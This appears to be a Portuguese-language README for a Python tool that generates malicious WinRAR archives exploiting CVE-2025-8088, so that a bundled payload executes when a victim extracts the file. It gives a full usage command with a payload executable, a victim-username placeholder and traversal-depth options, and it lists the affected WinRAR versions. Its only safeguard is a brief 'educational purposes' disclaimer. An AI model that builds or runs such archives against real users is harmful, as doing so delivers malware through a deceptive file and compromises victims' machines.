
Gerador de exploit baseado em Python para CVE-2025-8088 no WinRAR, criando arquivos RAR maliciosos que executam payloads ao serem extraídos para testes de segurança autorizados.
Este repositório contém um gerador de arquivos RAR maliciosos que abusa da vulnerabilidade CVE-2025-8088 no WinRAR, permitindo que um arquivo aparentemente legítimo execute um payload quando a vítima o extrai.
python3 exploit_7.12.py \
-p payload.exe \
-o exploit.rar \
--username [Ojo USUARIO VICTIMA] \
--placeholder-len 200 \
--max-up 12 \
--verbose
python exploit_cli.py --help
---
## ⚠️ Aviso
Este projeto é apenas para **fins educacionais e de pesquisa**.
Não deve ser utilizado em sistemas reais sem autorização explícita.
O autor não assume nenhuma responsabilidade pelo uso indevido.
---
## Versões vulneráveis
### WinRAR – CVE-2025-8088
- Versões do WinRAR 7.12 anteriores são VULNERÁVEIS
- Versões anteriores ao patch oficial
- Windows 10 / 11
- Arquiteturas x86 e x64